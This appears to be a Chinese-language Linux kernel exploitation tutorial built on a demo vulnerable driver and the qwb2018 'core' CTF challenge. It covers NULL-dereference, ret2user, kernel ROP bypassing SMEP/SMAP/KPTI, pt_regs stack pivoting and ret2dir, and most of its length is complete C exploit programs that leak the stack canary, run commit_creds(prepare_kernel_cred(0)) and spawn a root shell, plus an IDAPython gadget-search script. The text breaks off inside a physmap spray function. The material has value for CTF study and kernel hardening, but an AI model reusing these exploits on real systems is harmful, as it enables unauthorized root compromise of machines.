NULL Pointer Dereference

上古利用方法，仅做记录。

如果内核模块中存在可以被调用的空函数指针，那么调用该空指针函数会执行 0 地址对应的代码。如果此时在内存 0 地址处实现写入 payload 就会执行payload。

首先内核驱动代码如下，其中 my_funptr 是一个空函数指针，且在调用 write 函数时会执行到。

#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>

MODULE_LICENSE("Dual BSD/GPL");

void (*my_funptr)(void);

ssize_t bug1_write(struct file *file, const char *buf, size_t len, loff_t *loff) {
    printk("[+] bug1_write\n");
    my_funptr();
    return 1;
}

static struct proc_ops proc_fops = {
        .proc_write = bug1_write,
};

static int __init null_dereference_init(void) {
    printk("[+] null_dereference driver init\n");
    int proc = proc_create("bug1", 0666, 0, &proc_fops);
    if (!proc) printk("[-] Failed to create proc\n");
    return 0;
}

static void __exit null_dereference_exit(void) {
    printk("[-] null_dereference driver exit\n");
}

module_init(null_dereference_init);
module_exit(null_dereference_exit);

exp 如下，首先在 0 地址处写入提权 payload，然后调用 write 函数执行 payload，最后返回到用户空间执行 system("/bin/sh") 获取 shell 。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

char payload[] = "\x48\x31\xc0\xe8\xe8\x7b\x0d\x81\xe8\x93\x76\x0d\x81\xc3";

int main() {
    mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    memcpy(0, payload, sizeof(payload));
    int fd = open("/proc/bug1", O_WRONLY);
    write(fd, "123", 7);
    system("/bin/sh");
    return 0;
}

执行 exp ，利用 gdb 调试发现执行到 payload 。

不过现在的内核很难直接利用这一漏洞。

Kernel Stack Buffer Overflow

这里以 qwb2018 core 为例进行讲解。

core_fops 结构体中定义了 core_write ，core_ioctl ，core_release 三个回调函数。

core_write 向 name 写入 0x800 长度的数据。

__int64 __fastcall core_write(__int64 a1, __int64 a2, unsigned __int64 a3)
{
  printk("\x016core: called core_writen");
  if ( a3 <= 0x800 && !copy_from_user(&name, a2, a3) )
    return (unsigned int)a3;
  printk("\x016core: error copying data from userspacen", a2);
  return 4294967282LL;
}

core_ioctl 有三个功能，其中 0x6677889C 可以设置 off 。

__int64 __fastcall core_ioctl(__int64 a1, int a2, const void *a3)
{
  switch ( a2 )
  {
    case 0x6677889B:
      core_read(a3);
      break;
    case 0x6677889C:
      printk("\x016core: %d\n", a3);
      off = (__int64)a3;
      break;
    case 0x6677889A:
      printk("\x016core: called core_copy\n");
      core_copy_func((__int64)a3);
      break;
  }
  return 0LL;
}

core_read 可以越界读 canary 。

unsigned __int64 __fastcall core_read(const void *a1)
{
  ...
  char v5[64]; // [rsp+0h] [rbp-50h] BYREF
  unsigned __int64 canary; // [rsp+40h] [rbp-10h]

  canary = __readgsqword(0x28u);
  ...
  result = copy_to_user(a1, &v5[off], 64LL);
  ...
}

core_copy_func 存在栈溢出。

__int64 __fastcall core_copy_func(__int64 len)
{
  __int64 result; // rax
  char v2[64]; // [rsp+0h] [rbp-50h] BYREF
  unsigned __int64 canary; // [rsp+40h] [rbp-10h]

  canary = __readgsqword(0x28u);
  printk("\x016core: called core_writen");
  if ( len > 63 )
  {
    printk("\x016Detect Overflow");
    return 0xFFFFFFFFLL;
  }
  else
  {
    result = 0LL;
    qmemcpy(v2, &name, (unsigned __int16)len);
  }
  return result;
}

ret2user

即返回到用户空间的提权代码上进行提权，之后返回用户态即为 root 权限。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/ioctl.h>

#define KERNCALL __attribute__((regparm(3)))

void *(*prepare_kernel_cred)(void *) KERNCALL = (void *) 0xFFFFFFFF8109CCE0;

void *(*commit_creds)(void *) KERNCALL = (void *) 0xFFFFFFFF8109C8E0;

void *init_cred = (void *) 0xFFFFFFFF8223D1A0;

void get_shell() { system("/bin/sh"); }


struct trap_frame {
    size_t user_rip;
    size_t user_cs;
    size_t user_rflags;
    size_t user_sp;
    size_t user_ss;
} __attribute__((packed));
struct trap_frame tf;
size_t user_cs, user_rflags, user_sp, user_ss, tf_addr = (size_t) &tf;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    tf.user_rip = (size_t) get_shell;
    tf.user_cs = user_cs;
    tf.user_rflags = user_rflags;
    tf.user_sp = user_sp - 0x1000;
    tf.user_ss = user_ss;
    puts("[*] status has been saved.");
}

void get_root() {
//    commit_creds(init_cred);
    commit_creds(prepare_kernel_cred(0));
    asm("swapgs;"
        "mov rsp, tf_addr;"
        "iretq;");
}

int core_fd;

void coore_read(char *buf) {
    ioctl(core_fd, 0x6677889B, buf);
}

void set_off(size_t off) {
    ioctl(core_fd, 0x6677889C, off);
}

void core_copy_func(size_t len) {
    ioctl(core_fd, 0x6677889A, len);
}

void core_write(char *buf, size_t len) {
    write(core_fd, buf, len);
}

void rebase() {
    FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
    if (kallsyms_fd < 0) {
        puts("[-] Failed to open kallsyms.\n");
        exit(-1);
    }
    char name[0x50], type[0x10];
    size_t addr;
    while (fscanf(kallsyms_fd, "%llx%s%s", &addr, type, name)) {
        size_t offset = -1;
        if (!strcmp(name, "commit_creds")) {
            offset = addr - (size_t) commit_creds;
        } else if (!strcmp(name, "prepare_kernel_cred")) {
            offset = addr - (size_t) prepare_kernel_cred;
        }
        if (offset != -1) {
            printf("[*] offset: %p\n", offset);
            commit_creds = (void *) ((size_t) commit_creds + offset);
            prepare_kernel_cred = (void *) ((size_t) prepare_kernel_cred + offset);
            init_cred = (void *) ((size_t) init_cred + offset);
            break;
        }
    }
    printf("[*] commit_creds: %p\n", (size_t) commit_creds);
    printf("[*] prepare_kernel_cred: %p\n", (size_t) prepare_kernel_cred);
}

size_t get_canary() {
    set_off(64);
    char buf[64];
    coore_read(buf);
    return *(size_t *) buf;
}

int main() {
    rebase();
    save_status();
    core_fd = open("/proc/core", O_RDWR);
    if (core_fd < 0) {
        puts("[-] Failed to open core.");
        exit(-1);
    }
    size_t canary = get_canary();
    printf("[*] canary: %p\n", canary);
    char buf[0x100];
    memset(buf, 'a', sizeof(buf));
    *(size_t *) &buf[64] = canary;
    *(void **) &buf[80] = get_root;
    core_write(buf, sizeof(buf));
    core_copy_func(0xffffffffffff0000 | sizeof(buf));
    return 0;
}

kernel rop

开启 smep 和 smap 保护后，内核空间无法执行用户空间的代码，并且无法访问用户空间的数据。因此不能直接 ret2user 。
利用 ROP ，执行 commit_creds(prepare_kernel_cred(0)) , 然后 iret 返回用户空间可以绕过上述保护。

这里我添加了 smep 和 smap 保护。

#!/bin/sh

qemu-system-x86_64 \
  -m 256M \
  -kernel ./bzImage \
  -initrd ./core.cpio \
  -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet nokaslr" \
  -s \
  -netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
  -nographic \
  -cpu qemu64,+smep,+smap

并且不开启 KPTI 保护。

/ # cat /sys/devices/system/cpu/vulnerabilities/*
Not affected
Mitigation: __user pointer sanitization
Vulnerable: Minimal generic ASM retpoline

由于找不到 mov rdi, rax; ret; 这条 gadget ，因此需要用 mov rdi, rax; call rdx; 代替，其中 rdx 指向 pop rcx; ret; 可以清除 call 指令压入栈中的 rip ，因此相当于 ret 。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/ioctl.h>

size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0;
size_t commit_creds = 0xFFFFFFFF8109C8E0;
size_t init_cred = 0xFFFFFFFF8223D1A0;
size_t pop_rdi_ret = 0xffffffff81000b2f;
size_t pop_rdx_ret = 0xffffffff810a0f49;
size_t pop_rcx_ret = 0xffffffff81021e53;
size_t mov_rdi_rax_call_rdx = 0xffffffff8101aa6a;
size_t swapgs_popfq_ret = 0xffffffff81a012da;
size_t iretq = 0xffffffff81050ac2;

void get_shell() {
    system("/bin/sh");
}

size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

int core_fd;

void coore_read(char *buf) {
    ioctl(core_fd, 0x6677889B, buf);
}

void set_off(size_t off) {
    ioctl(core_fd, 0x6677889C, off);
}

void core_copy_func(size_t len) {
    ioctl(core_fd, 0x6677889A, len);
}

void core_write(char *buf, size_t len) {
    write(core_fd, buf, len);
}

void rebase() {
    FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
    if (kallsyms_fd < 0) {
        puts("[-] Failed to open kallsyms.\n");
        exit(-1);
    }
    char name[0x50], type[0x10];
    size_t addr;
    while (fscanf(kallsyms_fd, "%llx%s%s", &addr, type, name)) {
        size_t offset = -1;
        if (!strcmp(name, "commit_creds")) {
            offset = addr - (size_t) commit_creds;
        } else if (!strcmp(name, "prepare_kernel_cred")) {
            offset = addr - (size_t) prepare_kernel_cred;
        }
        if (offset != -1) {
            printf("[*] offset: %p\n", offset);
            commit_creds += offset;
            prepare_kernel_cred += offset;
            init_cred += offset;
            pop_rdi_ret += offset;
            pop_rdx_ret += offset;
            pop_rcx_ret += offset;
            mov_rdi_rax_call_rdx += offset;
            swapgs_popfq_ret += offset;
            iretq += offset;
            break;
        }
    }
    printf("[*] commit_creds: %p\n", (size_t) commit_creds);
    printf("[*] prepare_kernel_cred: %p\n", (size_t) prepare_kernel_cred);
}

size_t get_canary() {
    set_off(64);
    char buf[64];
    coore_read(buf);
    return *(size_t *) buf;
}

int main() {
    save_status();
    rebase();

    core_fd = open("/proc/core", O_RDWR);
    if (core_fd < 0) {
        puts("[-] Failed to open core.");
        exit(-1);
    }

    size_t canary = get_canary();
    printf("[*] canary: %p\n", canary);

    char buf[0x100];
    memset(buf, 'a', sizeof(buf));
    *(size_t *) &buf[64] = canary;

    size_t *rop = (size_t *) &buf[80], it = 0;


    rop[it++] = pop_rdi_ret;
    rop[it++] = init_cred;
    rop[it++] = commit_creds;

//    rop[it++] = pop_rdi_ret;
//    rop[it++] = 0;
//    rop[it++] = prepare_kernel_cred;
//    rop[it++] = pop_rdx_ret;
//    rop[it++] = pop_rcx_ret;
//    rop[it++] = mov_rdi_rax_call_rdx;
//    rop[it++] = commit_creds;

    rop[it++] = swapgs_popfq_ret;
    rop[it++] = 0;
    rop[it++] = iretq;
    rop[it++] = (size_t) get_shell;
    rop[it++] = user_cs;
    rop[it++] = user_rflags;
    rop[it++] = user_sp;
    rop[it++] = user_ss;

    core_write(buf, sizeof(buf));

    core_copy_func(0xffffffffffff0000 | sizeof(buf));

    return 0;
}

将 CPU 类型修改为 kvm64 后开启了 KPTI 保护。

#!/bin/sh

qemu-system-x86_64 \
  -m 256M \
  -kernel ./bzImage \
  -initrd ./core.cpio \
  -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet nokaslr" \
  -s \
  -netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
  -nographic \
  -cpu kvm64,+smep,+smap
#  -cpu qemu64,+smep,+smap

/ # cat /sys/devices/system/cpu/vulnerabilities/*
Mitigation: PTI
Mitigation: __user pointer sanitization
Vulnerable: Minimal generic ASM retpoline

此时需要借助 swapgs_restore_regs_and_return_to_usermode 返回用户态。

该函数是内核在 arch/x86/entry/entry_64.S 中提供的一个用于完成内核态到用户态切换的函数。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/ioctl.h>

size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0;
size_t commit_creds = 0xFFFFFFFF8109C8E0;
size_t init_cred = 0xFFFFFFFF8223D1A0;
size_t pop_rdi_ret = 0xffffffff81000b2f;
size_t pop_rdx_ret = 0xffffffff810a0f49;
size_t pop_rcx_ret = 0xffffffff81021e53;
size_t mov_rdi_rax_call_rdx = 0xffffffff8101aa6a;
size_t swapgs_popfq_ret = 0xffffffff81a012da;
size_t iretq = 0xffffffff81050ac2;
size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81A008DA;

void get_shell() {
    system("/bin/sh");
}

size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

int core_fd;

void coore_read(char *buf) {
    ioctl(core_fd, 0x6677889B, buf);
}

void set_off(size_t off) {
    ioctl(core_fd, 0x6677889C, off);
}

void core_copy_func(size_t len) {
    ioctl(core_fd, 0x6677889A, len);
}

void core_write(char *buf, size_t len) {
    write(core_fd, buf, len);
}

void rebase() {
    FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
    if (kallsyms_fd < 0) {
        puts("[-] Failed to open kallsyms.\n");
        exit(-1);
    }
    char name[0x50], type[0x10];
    size_t addr;
    while (fscanf(kallsyms_fd, "%llx%s%s", &addr, type, name)) {
        size_t offset = -1;
        if (!strcmp(name, "commit_creds")) {
            offset = addr - (size_t) commit_creds;
        } else if (!strcmp(name, "prepare_kernel_cred")) {
            offset = addr - (size_t) prepare_kernel_cred;
        }
        if (offset != -1) {
            printf("[*] offset: %p\n", offset);
            commit_creds += offset;
            prepare_kernel_cred += offset;
            init_cred += offset;
            pop_rdi_ret += offset;
            pop_rdx_ret += offset;
            pop_rcx_ret += offset;
            mov_rdi_rax_call_rdx += offset;
            swapgs_popfq_ret += offset;
            iretq += offset;
            swapgs_restore_regs_and_return_to_usermode += offset;
            break;
        }
    }
    printf("[*] commit_creds: %p\n", (size_t) commit_creds);
    printf("[*] prepare_kernel_cred: %p\n", (size_t) prepare_kernel_cred);
}

size_t get_canary() {
    set_off(64);
    char buf[64];
    coore_read(buf);
    return *(size_t *) buf;
}

int main() {
    save_status();
    rebase();

    core_fd = open("/proc/core", O_RDWR);
    if (core_fd < 0) {
        puts("[-] Failed to open core.");
        exit(-1);
    }

    size_t canary = get_canary();
    printf("[*] canary: %p\n", canary);

    char buf[0x100];
    memset(buf, 'a', sizeof(buf));
    *(size_t *) &buf[64] = canary;

    size_t *rop = (size_t *) &buf[80], it = 0;


    rop[it++] = pop_rdi_ret;
    rop[it++] = init_cred;
    rop[it++] = commit_creds;

//    rop[it++] = pop_rdi_ret;
//    rop[it++] = 0;
//    rop[it++] = prepare_kernel_cred;
//    rop[it++] = pop_rdx_ret;
//    rop[it++] = pop_rcx_ret;
//    rop[it++] = mov_rdi_rax_call_rdx;
//    rop[it++] = commit_creds;

    rop[it++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
    rop[it++] = 0;
    rop[it++] = 0;
    rop[it++] = (size_t) get_shell;
    rop[it++] = user_cs;
    rop[it++] = user_rflags;
    rop[it++] = user_sp;
    rop[it++] = user_ss;

    core_write(buf, sizeof(buf));

    core_copy_func(0xffffffffffff0000 | sizeof(buf));

    return 0;
}

如果找不到 swapgs_restore_regs_and_return_to_usermode 则可以为 SIGSEGV 注册异常处理函数 get_shell ，然后按照没有 kpti 的方式返回用户态。触发异常后自动完成用户态的返回。

1	signal(SIGSEGV, get_shell);

kernel rop + ret2user

这种方法实际上是将前两种方法结合起来，同样可以绕过 smap 和 smep 包含。大体思路是先利用 rop 设置 cr4 为 0x6f0 （这个值可以通过用 cr4 原始值 & 0xFFFFF 得到）关闭 smep ，然后 iret 到用户空间去执行提权代码。

注意这里 smap 保护不能直接关闭，因此不能像前面 ret2usr 那样直接在 exp 中写入 trap frame 然后栈迁移到 trap frame 的地址，而是在 rop 中构造 trap frame 结构。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/ioctl.h>

#define KERNCALL __attribute__((regparm(3)))

void *(*prepare_kernel_cred)(void *) KERNCALL = (void *) 0xFFFFFFFF8109CCE0;

void *(*commit_creds)(void *) KERNCALL = (void *) 0xFFFFFFFF8109C8E0;

void *init_cred = (void *) 0xFFFFFFFF8223D1A0;
size_t pop_rdi_ret = 0xffffffff81000b2f;
size_t pop_rdx_ret = 0xffffffff810a0f49;
size_t pop_rcx_ret = 0xffffffff81021e53;
size_t mov_cr4_rdi_ret = 0xffffffff81075014;
size_t mov_rdi_rax_call_rdx = 0xffffffff8101aa6a;
size_t swapgs_popfq_ret = 0xffffffff81a012da;
size_t iretq = 0xffffffff81050ac2;

void get_shell() { system("/bin/sh"); }

size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

void get_root() {
//    commit_creds(init_cred);
    commit_creds(prepare_kernel_cred(0));
}

int core_fd;

void coore_read(char *buf) {
    ioctl(core_fd, 0x6677889B, buf);
}

void set_off(size_t off) {
    ioctl(core_fd, 0x6677889C, off);
}

void core_copy_func(size_t len) {
    ioctl(core_fd, 0x6677889A, len);
}

void core_write(char *buf, size_t len) {
    write(core_fd, buf, len);
}

void rebase() {
    FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
    if (kallsyms_fd < 0) {
        puts("[-] Failed to open kallsyms.\n");
        exit(-1);
    }
    char name[0x50], type[0x10];
    size_t addr;
    while (fscanf(kallsyms_fd, "%llx%s%s", &addr, type, name)) {
        size_t offset = -1;
        if (!strcmp(name, "commit_creds")) {
            offset = addr - (size_t) commit_creds;
        } else if (!strcmp(name, "prepare_kernel_cred")) {
            offset = addr - (size_t) prepare_kernel_cred;
        }
        if (offset != -1) {
            printf("[*] offset: %p\n", offset);
            commit_creds = (void *) ((size_t) commit_creds + offset);
            prepare_kernel_cred = (void *) ((size_t) prepare_kernel_cred + offset);
            init_cred = (void *) ((size_t) init_cred + offset);
            pop_rdi_ret += offset;
            pop_rdx_ret += offset;
            pop_rcx_ret += offset;
            mov_rdi_rax_call_rdx += offset;
            swapgs_popfq_ret += offset;
            iretq += offset;
            break;
        }
    }
    printf("[*] commit_creds: %p\n", (size_t) commit_creds);
    printf("[*] prepare_kernel_cred: %p\n", (size_t) prepare_kernel_cred);
}

size_t get_canary() {
    set_off(64);
    char buf[64];
    coore_read(buf);
    return *(size_t *) buf;
}

int main() {
    save_status();
    rebase();

    core_fd = open("/proc/core", O_RDWR);
    if (core_fd < 0) {
        puts("[-] Failed to open core.");
        exit(-1);
    }

    size_t canary = get_canary();
    printf("[*] canary: %p\n", canary);

    char buf[0x100];
    memset(buf, 'a', sizeof(buf));
    *(size_t *) &buf[64] = canary;

    size_t *rop = (size_t *) &buf[80], it = 0;


    rop[it++] = pop_rdi_ret;
    rop[it++] = 0x00000000000006f0;
    rop[it++] = mov_cr4_rdi_ret;
    rop[it++] = (size_t) get_root;
    rop[it++] = swapgs_popfq_ret;
    rop[it++] = 0;
    rop[it++] = iretq;
    rop[it++] = (size_t) get_shell;
    rop[it++] = user_cs;
    rop[it++] = user_rflags;
    rop[it++] = user_sp;
    rop[it++] = user_ss;

    core_write(buf, sizeof(buf));

    core_copy_func(0xffffffffffff0000 | sizeof(buf));

    return 0;
}

利用 pt_regs 构造 kernel ROP

这次我们限制溢出只能覆盖返回地址，此时需要栈迁移到其他地方构造 rop 。其中一个思路就是在 pt_regs 上构造 rop 。

我们在调用 core_copy_func 函数之前先将寄存器设置为几个特殊的值，然后再 core_copy_func 函数的返回处下断点。

__asm__(
        "mov r15, 0x1111111111111111;"
        "mov r14, 0x2222222222222222;"
        "mov r13, 0x3333333333333333;"
        "mov r12, 0x4444444444444444;"
        "mov rbp, 0x5555555555555555;"
        "mov rbx, 0x6666666666666666;"
        "mov r11, 0x7777777777777777;"
        "mov r10, 0x8888888888888888;"
        "mov r9, 0x9999999999999999;"
        "mov r8, 0xaaaaaaaaaaaaaaaa;"
        "mov rcx, 0xbbbbbbbbbbbbbbbb;"
        "mov rax, 16;"
        "mov rdx, 0xffffffffffff0050;"
        "mov rsi, 0x6677889A;"
        "mov rdi, core_fd;"
        "syscall"
        );

此时可以看到 pt_regs 相对于栈顶的偏移为 0xF0 ，除去这里的 ret 需要将 rsp 加上 0xE8 才能将栈迁移到 pt_regs 的起始地址。

另外值得注意的是 pt_regs 中对应 r11 和 rcx 的位置分别被写入了 eflags 和返回地址，因此不受我们控制。

设置条件断点查证一下，发现在程序入口点的位置这个两个寄存器就已经被修改了。

借助 IDAPython 脚本在 vmlinux 中查找合适的 gadget 。

import idc
from idaapi import *
import idautils

start_ea = None
end_ea = None
max_len = 10
class Gadget():
    def __init__(self, addr, asms, val):
        self.addr = addr
        self.asms = asms
        self.val = val


if __name__ == '__main__':
    for seg in idautils.Segments():
        if idc.get_segm_name(seg) == '.text':
            start_ea = idc.get_segm_start(seg)
            end_ea = idc.get_segm_end(seg)
            break
    assert start_ea != None
    fp = open("rop.txt", "w")
    gadgets = []
    i = start_ea
    while i < end_ea:
        asm = idc.generate_disasm_line(i, 0).split(";")[0]
        if asm.startswith("add     rsp, "):
            asms = [asm.replace("     ", " ")]
            val = idc.get_operand_value(i, 1)
            j = i + get_item_size(i)
            while j < end_ea:
                asm = idc.generate_disasm_line(j, 0).split(";")[0]
                asms.append(asm.replace("     ", " "))
                if len(asms) > max_len: break
                if "rsp" in asm or "esp" in asm or "leave" in asm or "call" in asm: break
                if print_insn_mnem(j) == "push": val -= 8
                if print_insn_mnem(j) == "pop": val += 8
                if print_insn_mnem(j) == "retn":
                    gadgets.append(Gadget(i, asms, val))
                    gadget = Gadget(i, asms, val)
                    print("val: " + hex(gadget.val))
                    print(hex(gadget.addr) + " : " + "; ".join(gadget.asms) + ";")
                    j += get_item_size(j)
                    break
                j += get_item_size(j)
            i = j
        else:
            i += get_item_size(i)
    gadgets = sorted(gadgets, key=lambda gadget: gadget.val)
    print("_________________________________________")
    print(len(gadgets))
    for gadget in gadgets:
        fp.write("val: " + hex(gadget.val) + "\n")
        fp.write(hex(gadget.addr) + " : " + "; ".join(gadget.asms) + ";\n")
    fp.close()

随便选择一个可以把 rsp 加 0xE8 的 gadget 。

由于 swapgs_restore_regs_and_return_to_usermode 函数前面的操作是依次弹出 pt_regs 结构体中的元素，由于前面 4 个寄存器已经用来写 ROP 了，因此要从 swapgs_restore_regs_and_return_to_usermode + 8 开始。

由于这里用的是正常的 trap_frame 因此不需要 save_status 和伪造 trap_frame 。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>

size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0;
size_t commit_creds = 0xFFFFFFFF8109C8E0;
size_t init_cred = 0xFFFFFFFF8223D1A0;
size_t pop_rdi_ret = 0xffffffff81000b2f;
size_t add_rsp_0xe8_ret = 0xffffffff816bb966;
size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81A008DA;

int core_fd;

void coore_read(char *buf) {
    ioctl(core_fd, 0x6677889B, buf);
}

void set_off(size_t off) {
    ioctl(core_fd, 0x6677889C, off);
}

void core_write(char *buf, size_t len) {
    write(core_fd, buf, len);
}

void rebase() {
    FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
    if (kallsyms_fd < 0) {
        puts("[-] Failed to open kallsyms.\n");
        exit(-1);
    }
    char name[0x50], type[0x10];
    size_t addr;
    while (fscanf(kallsyms_fd, "%llx%s%s", &addr, type, name)) {
        size_t offset = -1;
        if (!strcmp(name, "commit_creds")) {
            offset = addr - (size_t) commit_creds;
        } else if (!strcmp(name, "prepare_kernel_cred")) {
            offset = addr - (size_t) prepare_kernel_cred;
        }
        if (offset != -1) {
            printf("[*] offset: %p\n", offset);
            commit_creds += offset;
            prepare_kernel_cred += offset;
            init_cred += offset;
            pop_rdi_ret += offset;
            add_rsp_0xe8_ret += offset;
            swapgs_restore_regs_and_return_to_usermode += offset + 8;
            break;
        }
    }
    printf("[*] commit_creds: %p\n", (size_t) commit_creds);
    printf("[*] prepare_kernel_cred: %p\n", (size_t) prepare_kernel_cred);
}

size_t get_canary() {
    set_off(64);
    char buf[64];
    coore_read(buf);
    return *(size_t *) buf;
}

int main() {
    rebase();

    core_fd = open("/proc/core", O_RDWR);
    if (core_fd < 0) {
        puts("[-] Failed to open core.");
        exit(-1);
    }

    size_t canary = get_canary();
    printf("[*] canary: %p\n", canary);

    char buf[0x100];
    memset(buf, 'a', sizeof(buf));
    *(size_t *) &buf[64] = canary;
    *(size_t *) &buf[80] = add_rsp_0xe8_ret;

    core_write(buf, sizeof(buf));
    __asm__(
            "mov r15, pop_rdi_ret;"
            "mov r14, init_cred;"
            "mov r13, commit_creds;"
            "mov r12, swapgs_restore_regs_and_return_to_usermode;"
            "mov rbp, 0x5555555555555555;"
            "mov rbx, 0x6666666666666666;"
            "mov r11, 0x7777777777777777;"
            "mov r10, 0x8888888888888888;"
            "mov r9, 0x9999999999999999;"
            "mov r8, 0xaaaaaaaaaaaaaaaa;"
            "mov rax, 16;"
            "mov rdx, 0xffffffffffff0058;"
            "mov rsi, 0x6677889A;"
            "mov rdi, core_fd;"
            "syscall"
            );

    system("/bin/sh");

    return 0;
}

ret2dir

如果 ptregs 所在的内存被修改了导致最多只能控制 16 字节的内存我们可以利用 ret2dir 的利用方式将栈迁移至内核的线性映射区。

ret2dir 是哥伦比亚大学网络安全实验室在 2014 年提出的一种辅助攻击手法，主要用来绕过 smep、smap、pxn 等用户空间与内核空间隔离的防护手段，原论文见此处：http://www.cs.columbia.edu/~vpk/papers/ret2dir.sec14.pdf 。
linux 系统有一部分物理内存区域同时映射到用户空间和内核空间的某个物理内存地址。一块区域叫做 direct mapping area，即内核的线性映射区。，这个区域映射了所有的物理内存。

1	ffff888000000000 \| -119.5 TB \| ffffc87fffffffff \| 64 TB \| direct mapping of all physical memory (page_offset_base)

下图便是原论文中对 ret2dir 这种攻击的示例，我们在用户空间中布置的 gadget 可以通过 direct mapping area 上的地址在内核空间中访问到

但需要注意的是在新版的内核当中 direct mapping area 已经不再具有可执行权限，因此我们很难再在用户空间直接布置 shellcode 进行利用，但我们仍能通过在用户空间布置 ROP 链的方式完成利用

比较朴素的一种使用 ret2dir 进行攻击的手法便是：

利用 mmap 在用户空间大量喷射内存
利用漏洞泄露出内核的“堆”上地址（通过 kmalloc 获取到的地址），这个地址直接来自于线性映射区
利用泄露出的内核线性映射区的地址进行内存搜索，从而找到我们在用户空间喷射的内存
此时我们就获得了一个映射到用户空间的内核空间地址，我们通过这个内核空间地址便能直接访问到用户空间的数据，从而避开了传统的隔绝用户空间与内核空间的防护手段

需要注意的是我们往往没有内存搜索的机会，因此需要使用 mmap 喷射大量的物理内存写入同样的 payload，之后再随机挑选一个线性映射区上的地址进行利用，这样我们就有很大的概率命中到我们布置的 payload 上，这种攻击手法也称为 physmap spray 。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

/*
linux kernal 4.15.8
/Documentation/x86/x86_64/mm.txt
ffff880000000000 - ffffc7ffffffffff (=64 TB) direct mapping of all phys. memory
*/
size_t try_hit = 0xffff880000000000 + 0x7000000;
size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0;
size_t commit_creds = 0xFFFFFFFF8109C8E0;
size_t init_cred = 0xFFFFFFFF8223D1A0;
size_t pop_rdi_ret = 0xffffffff81000b2f;
size_t pop_rsp_ret = 0xffffffff81001689;
size_t add_rsp_0xe8_ret = 0xffffffff816bb966;
size_t ret = 0xFFFFFFFF8100168A;
size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81A008DA;
size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

void get_shell() { system("/bin/sh"); }

int core_fd;

void coore_read(char *buf) {
    ioctl(core_fd, 0x6677889B, buf);
}

void set_off(size_t off) {
    ioctl(core_fd, 0x6677889C, off);
}

void core_write(char *buf, size_t len) {
    write(core_fd, buf, len);
}

void rebase() {
    FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
    if (kallsyms_fd < 0) {
        puts("[-] Failed to open kallsyms.\n");
        exit(-1);
    }
    char name[0x50], type[0x10];
    size_t addr;
    while (fscanf(kallsyms_fd, "%llx%s%s", &addr, type, name)) {
        size_t offset = -1;
        if (!strcmp(name, "commit_creds")) {
            offset = addr - (size_t) commit_creds;
        } else if (!strcmp(name, "prepare_kernel_cred")) {
            offset = addr - (size_t) prepare_kernel_cred;
        }
        if (offset != -1) {
            printf("[*] offset: %p\n", offset);
            commit_creds += offset;
            prepare_kernel_cred += offset;
            init_cred += offset;
            pop_rdi_ret += offset;
            add_rsp_0xe8_ret += offset;
            pop_rsp_ret += offset;
            ret += offset;
            swapgs_restore_regs_and_return_to_usermode += offset;
            break;
        }
    }
    printf("[*] commit_creds: %p\n", (size_t) commit_creds);
    printf("[*] prepare_kernel_cred: %p\n", (size_t) prepare_kernel_cred);
}

size_t get_canary() {
    set_off(64);
    char buf[64];
    coore_read(buf);
    return *(size_t *) buf;
}

void physmap_spray() {
    size_t page_size = sysconf(_SC_PAGESIZE);
    size_t *rop = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    int it = 0;
    for (; it < (page_size / 8 - 11); it++) {
        rop[it] = ret;
    }
